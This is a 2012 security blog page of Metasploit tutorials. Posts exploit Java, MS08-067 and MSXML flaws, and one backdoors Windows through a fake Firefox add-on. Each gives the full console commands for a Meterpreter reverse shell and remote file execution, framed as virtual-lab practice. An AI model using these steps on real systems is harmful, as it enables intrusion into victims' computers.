Showing posts with label Metasploit. Show all posts
Showing posts with label Metasploit. Show all posts

Wednesday, July 25, 2012

Hacking Remote Pc by Exploiting Java Applet Field Bytecode Verifier Cache Remote Code Execution




CVE-2012-1723: A vulnerability in the HotSpot bytecode verifier where an invalid optimization of GETFIELD/PUTFIELD/GETSTATIC/PUTSTATIC instructions leads to insufficient type checking. A specially-crafted class file could possibly use this flaw to bypass Java sandbox restrictions, and load additional classes in order to perform malicious operations. The vulnerability was made public by Michael ‘mihi’ Schierl.

Requirement:
  • Attacker Machine: Backtrack
  • Victim Machine: Windows (install JRE un-patched version  )
Step1: Launch the Metasploit console
Open the Terminal in the Attacker Machine(Backtrack).
Type "msfupdate" , this will update the metasploit with latest modules.
Now type "msfconsole" to get interaction with the Metasploit framework.

Step 2:
Type "use exploit/multi/browser/java_verifier_field_access" and follow the below commands:


msf exploit(java_verifier_field_access) > set PAYLOAD java/meterpreter/reverse_http
msf exploit(java_verifier_field_access) > set LHOST [Backtrack IP ADDRESS]
msf exploit(java_verifier_field_access) > exploit

If you don't know what i am talking about , please read my previous tutorial.

Step 3:
If you follow the above commands correctly, you will get the following result.

Copy the url and open the link in the victim machine. Once the url loaded in the victim machine, it will launch the exploit and creates a new session.

Now type "sessions", this will show the list of active sessions .

Type "sessions -i 1", this will open the connection to the session with the id '1' and bring you to Meterpreter. Meterpreter will help you to interact/control the Target.

References:
  • POC: http://schierlm.users.sourceforge.net/CVE-2012-1723.html
  • Metasploit Module: http://www.exploit-db.com/exploits/19717/
Continue   Reading>>

Saturday, July 14, 2012

[Metasploit Tutorial] Hacking Windows XP using IP Address


Do you think it is possible to hack some one computer with just an ip address?! The answer is yes, if you are using unpatched(vulnerable) OS.  If you don't believe me, then read the full article.

In this article i am going to demonstrate how to hack a remote computer by exploiting the  parsing flaw in the path canonicalization code of NetAPI32.dll through the Server Service(CVE-2008-4250). Before we jump into the actual exploitation process, let me give more details about this Server Service Vulnerability.

Details about Server Service Vulnerability(MS08-067):
Microsoft Windows Server service provides support for sharing resources such as files and print services over the network.

The Server service is vulnerable to a remote code-execution vulnerability. The vulnerability is caused due to an error in netapi32.dll when processing directory traversal character sequences in path names. This can be exploited to corrupt stack memory by e.g. sending RPC requests containing specially crafted path names to the Server Service component. The 'NetprPathCanonicalize()' function in the 'netapi32.dll' file is affected.

A malicious request to vulnerable system results in complete compromise of vulnerable computers.
This vulnerability affects Windows XP, Windows 2000, Windows Server 2003, Windows Vista, and Windows Server 2008. But Attackers require authenticated access on Windows Vista and Server 2008 platforms to exploit this issue.

Exploiting the MS08-067 using Metasploit:

Requirements:
  • VirtualBox
  • Backtrack 5
  • Target OS(XP)
Step 1:

Create Two Virtual Machine(VM) namely "Target" and "BT5".  Install the XP inside Target VM and Backtrack inside BT5. Start the Two VMs.

If you don't know how to create virtual machines , then please read this VirtualBox Manual.

Step 2: Find the IP address of Target
Open The command prompt in the Target machine(XP). Type "ipconfig" to find the IP address of the Target system.

Hackers use different method for finding the ip address of victim.  For Eg., By sending link that will get the ip  details or use Angry IP Scanner.

Step 3: Information Gathering
Now let us collect some information about the Target machine.  For this purpose , we are going to use the nmap tool.

Open The Terminal in the BT5 machine(Backtrack) and type "nmap -O 192.168.56.12".  Here 192.168.56.12 is IP address of Target machine. If you look at the result, you can find the list of open ports and OS version.


Step 4: Metasploit
Now open the Terminal in the BT5 machine(Backtrack) and Type "msfconsole".

The msfconsole is the most popular interface to the Metasploit Framework. It provides an "all-in-one" centralized console and allows you efficient access to virtually all of the options available in the Metasploit Framework.

Let us use the Search command to find the exploit modules with the keyword netapi. Type "search netapi".  Now you can see the list of modules match with the netapi.


We are going to exploit MS08-067 , so type "use exploit/windows/smb/ms08_067_netapi".

Step 5: Set Payload
As usual, let use the Reverse Tcp Payload for this exploit also. Type "set payload windows/meterpreter/reverse_tcp" in the msfconsole.

Step 6: Options
Type "set LHOST 192.168.56.10".  Here 192.168.56.10 is IP address of Backtrack machine.  You can find the ip address by typing 'ifconfig' command in the Terminal.

Type "set RHOST 192.168.56.12".  Here 192.168.56.12 is IP address of Target machine.

Step 7: Exploiting
Ok, it is time to exploit the vulnerability, type "exploit" in the console. If the exploit is successful, you can see the following result.

Now we can control the remote computer using the meterpreter. For example, typing "screenshot" will grab the screenshot of the victim system.

CounterMeasures:
Update your OS frequently.

Continue   Reading>>

Wednesday, June 20, 2012

CVE-2012-1889: Microsoft XML Core Services Vulnerability Metasploit Demo


CVE-2012-1889: Microsoft XML Core Services Vulnerability
A vulnerability in Microsoft XML Core Services 3.0, 4.0, 5.0, and 6.0 allows remote code execution if a user views a specially crafted webpage using Internet Explorer.

An attacker would have no way to force users to visit such a website. Instead, an attacker would have to convince users to visit the website, typically by getting them to click a link in an email message or Instant Messenger message that takes them to the attacker's website.

The vulnerability affects all supported releases of Microsoft Windows, and all supported editions of Microsoft Office 2003 and Microsoft Office 2007. Here you can the full list.

The vulnerability exists when MSXML attempts to access an object in memory that has not been initialized, which may corrupt memory in such a way that an attacker could execute arbitrary code in the context of the logged-on user.
I am going to demonstrate how to use Metasploit tool for testing whether your network vulnerable or not.

Open the Terminal and type "msfupdate" to get the latest metasploit modules. Once update is finished, then type "msfconsole".

Then type the following command in the console "use exploit/windows/browser/msxml_get_definition_code_exec".

Now we have to know the list of settings available for this exploit module. In order to get the list , you can type "show options" in the console.

Command: set SRVHOST 192.168.56.10
Details: Here the 192.168.56.11 is the ip of Backtrack . You can get this ip by simply typing the "ifconfig" in the terminal.

Command: set lhost 192.168.56.10

Command: set URIPATH /
Details: The path in which our exploit will run.

As usual, we can use Reverse Tcp payload for this attack also. So type the following command in the Metasploit console:
set payload windows/meterpreter/reverse_tcp

Type "exploit" in the console.


Once the victim loads the URL in his IE browser, you will get the following message in your metasploit console:

[*] msxml_get_definition_code_exec - Using msvcrt ROP

[*] msxml_get_definition_code_exec - 10.0.1.79:1564 - Sending html

[*] Sending stage (752128 bytes) to 192.168.56.12

[*] Meterpreter session 1 opened (192.168.56.10:4444 -> 192.168.56.12:1565)

Type "sessions" to list the active sessions . Type "sessions -i 1", this will open the connection to the session with the id '1' and bring you to Meterpreter.

Type "sysinfo" in the meterpreter to get the system information.
Continue   Reading>>

Tuesday, May 22, 2012

Hacking Windows 7 & Xp with Fake Firefox add-on (XPI) : Metasploit Tutorials


Hello BTS readers, i believe you enjoyed my last tutorial ( Java AtomicReferenceArray type violation vulnerability and exploiting ). So here is second tutorial for you ! In this tutorial i am going to explain how to hack any windows machine(xp,7) with the help of Metasploit.

Unlike last tutorial, we are not going to exploit any kind of vulnerabilities. We are going to use Social Engineering technique instead.

What exactly i am going to do?!
  1. Create a fake firefox extension with Metasploit that creates a backdoor from the victim system.
  2. Trick users into installing the add-on
  3. Break into the Target Machine.
Pre-configuration:
  • As usual, you have to set up two virutal machines(VM ) in your virtualbox namely "Target" and "Attacker".
  • Install the windows xp or 7 in the Target VM.
  • Install the Backtrack in the Attacker VM.
need help in configuring the VM?! you can read this tutorial "Set up pentesting lab".

Part I: Update the Metasploit 
As we are going to use the latest module, you are advised to update the Metasploit modules.  Don't know how to do this? No need to worry!
  • Open the Terminal 
  • type msfupdate
  • This will update the Metasploit with latest modules :)
Part II: Configuring settings in Metasploit for the fake-addon exploit
Step 1:

Open the Terminal and type "msfconsole" to get the Metasploit console.

Step 2:
Type "use exploit/multi/browser/firefox_xpi_bootstrapped_addon" in the console.

Step 3:
Now we have to know the list of settings available for this exploit module.  In order to get the list , you can type "show options" in the console.

Unlike the last tutorial, this module has an extra settings for the module namely "addonname".

Step 4: Configurations
Let us configure the setting for the exploit.
type the highlighted commands one by one in the console

Command: set addonname fake
Details: Name for the fake add-on.  you can change the "fake" to any name.

Command:set SRVHOST 192.168.56.11 
Details: Here the 192.168.56.11 is the ip of Backtrack .  You can get this ip by simply typing the "ifconfig" in the terminal. If you have trouble in getting the ip details, please drop your comment or read my previous post. 

Command: set SRVPORT 80
Details: Our server is going to be accessed via the port 80(default port)

Command: set URIPATH fakeEx
Details: The path in which the fake add-on will be available to download. For ex: http://192.168.56.11/fakeEx

Command: set LHOST 192.168.56.11 
Details: Here the 192.168.56.11 is the ip of Backtrack .  You can get this ip by simply typing the "ifconfig" in the terminal.

Step 5: Payload

As usual, we can use Reverse Tcp payload for this attack also. So type the following command in the Metasploit console:
set payload windows/meterpreter/reverse_tcp

Part III: Social Engineering Attack

Successfully configured the settings for the exploit, what else?! let us launch the exploit.
Type "exploit" in the console.
Now the exploit is started.  Our fake add-on is available at, "http://192.168.56.11/fakeEx".

Once victim visit the link, it will ask user to install the add-on in order to view the page.  Once user install the add-on, the system will be backdoor-ed.




Now , You can control the victim system from meterpreter.


Countermeasures:
I believe you understand the risks of installing the add-on from unknown sources.  So, think twice before installing add-on .  Always use trusted add-on.  Search in the google for review about the add-on.

Disclaimer:
The article given here is educational purpose only.  We suggest you to try this method in a controlled virtualbox environment.  We are not responsible for your illegal activity. 
Continue   Reading>>

Sunday, May 13, 2012

How to hack remote computer using Metasploit? Exploiting Java vulnerability CVE-2012-0507




Whenever someone say PenTesting tool, the first thing come in our mind is MetaSploit . Today, i am going to demonstrate how to use the Metasploit tool to exploit the popular java AtomicReferenceArray Type Violation vulnerability(CVE-2012-0507).
About MetaSploit:
Metsploit is a very Powerful PenTesting Tool . Metasploit Framework, a tool for developing and executing exploit code against a remote target machine. The Metasploit Project is also well known for anti-forensic and evasion tools, some of which are built into the Metasploit Framework. Very useful tool for Information Gathering, Vulnerability Scanning, Exploit Development, Client side exploits,...
Mastering the Framework: A free course from Offensive-Security
The Offensive Security Team along with several active community members, made a free course on the Metasploit Framework "Mastering the Framework". The course covers Information gathering, Social engineering attacks, exploit development, Advance AV avoidance and etc...

The course is available here:
www.offensive-security.com/metasploit-unleashed/Introduction

Donate to HFC, Feed a Child!
The "Mastering the Framework" is free course. If you enjoyed the course, please donate to Hackers for Charity(HFC). Beyond merely providing food for children in need in East Africa, the Hackers for Charity Food Program enables children and their families to provide for themselves and become more self-sufficient by teaching them valuable agricultural skills. Every cent received is directly sent Hackers for Charity in support of their mission. Any amount, no matter how small, makes a difference; it only takes $9.00 to feed a child for a month.

You can find further details about the donation here:
http://www.offensive-security.com/metasploit-unleashed/Donate

Hey, where are you going?! Wait a Sec, take that course Once i demonstrate how to use the metasploit. Because, It will be hard to understand or boring, if you read those things directly.

Requirements:
  • VirtualBox 
  • Target OS(windows,...)
  • PenTesting Distro(Backtrack )
  • JRE 6(unpatched version)

CVE-2012-0507 is a vulnerability in the JRE due to the fact that The AtomicReferenceArray class implementation did not properly check if the array is of an expected Object[] type. A malicious Java application or applet could use this flaw to cause Java Virtual Machine(JVM) to crash or bypass Java sandbox restrictions.

Security News: This vulnerability affects Windows, Mac and Linux operating systems. Last month, Flashback malware infect more than 600,000 Mac computers by exploiting this vulnerability. Recently, The INSS , The Amnesty International UK websites injected with malicious code that exploit the CVE-2012-0507.
I am going to demonstrate this vulnerability with VirtualBox.  I have setup two Virtual Machines namely "Target" and "BT5". I have installed XP 2 in the Target and Backtrack 5 R2 in the 'BT5'.

(need help in configuring the VM?, read this: setup PenTesting Lab).

Part I: Preparing the Target Machine:
Start the "Target" Machine.
Install the JRE 6.

Part II: Preparing the PenTesting Machine:
Now, start the BT5.

Open the Terminal and Type "msfupdate".  This will update the Metasploit Framework(MSF) with the latest exploits and Payloads. As CVE-2012-0507 is latest vulnerability, you have to update the MSF before proceeding further.

slow Internet Connection?! If you have slow internet connection, then you can download the java_atomicreferencearray module alone instead of updating all modules.
Download the java_atomicreferencearray.rb and paste in this folder "/opt/metasploit/msf3/modules/exploits/multi/browser/"

Then, Download CVE-2012-0507.jar and paste in this folder "/opt/metasploit/msf3/data/exploits/"

Part III :

Exploiting the Java AtomicReferenceArray Type Violation Vulnerability:



Step 1:
Open the Terminal and type "msfconsole".  This will bring the Metasploit console , here you can interact with the MSF.

Step 2:
Type "use exploit/multi/browser/java_atomicreferencearray" . This command will use the java_atomicreferencearray.rb module for the attack.


Now type "show options" to display the which settings are available and/or required for this specific module.



Now type "set SRVPORT 80".
and  "set URIPATH /".



Step 3: Set Payload
Type "show payloads", this will displays the list of payloads.  We are going to use the 'reverse_tcp' payload. This payload will get reverse tcp connection from the Target to PenTesting machine.

Type 'set payload java/meterpreter/reverse_tcp' in the console.


set LHOST [IP_address] :  In order to get reverse connection, we have to set our IP in the LHOST. 

open the Terminal and type "ifconfig". This will display the IP info of our PenTesting Machine.  The IP will be "192.168.56.x".   For instance, let me say the ip is 192.168.56.10.

Now  Type in the msfconsole as "set LHOST 192.168.56.10".



Part IV: Breaching the Target Machine:

So , are you ready?! Let us break into the Target Machine.

Step 1:

Type "exploit" in the msfconsole. This will start the reverse handler to our Machine and it will wait anyone that will connect to the our HTTP server (Eg: http://192.168.56.10). Once victim connect to our server, it will send a jar will that will exploit the CVE-2012-0507 vulnerability.

step 2:

Open the Firefox/IE in the Target machine. 
Enter "http://192.168.56.10".
It loads nothing but exploit will run in the background.
Step 3:
Open the BT5 machine, it will display the following output:


Now type "sessions", this will show the list of active sessions .

Type "sessions -i 1", this will open the connection to the session with the id '1' and bring you to Meterpreter. Meterpreter will help you to interact/control with the Target.



Step 4:Upload files
Yeeeh..! we got backdoor to the Target machine, now we can run any commands in the Target.



For Example, Typing 'sysinfo' will display the system information.


You can also upload and execute your own executable files in the Target machine.

'upload /Test.exe c:\\", this command will upload the Test.exe from the root('file system' dir) folder of the BT5 to the C drive of the Target.

'execute -f C:\\Test.exe", this command will run our uploaded File in the Target.


Security Tips:
Update your JRE to the latest version.


conclusion:
I hope this article has given you a good insight into how to use MetaSploit Framework to exploit the Java vulnerability.  I hope this will help you to get into the PenTesting world..!

So, you enjoyed the Tutorial , right?! If you have any suggestion or have doubt, please drop your comment/mail me.
Continue   Reading>>
Older Post Home
 

© Break The Security. Copyright 2008 All Rights Reserved Revolution Two Church theme by Brian Gardner Converted into Blogger Template by Bloganol dot com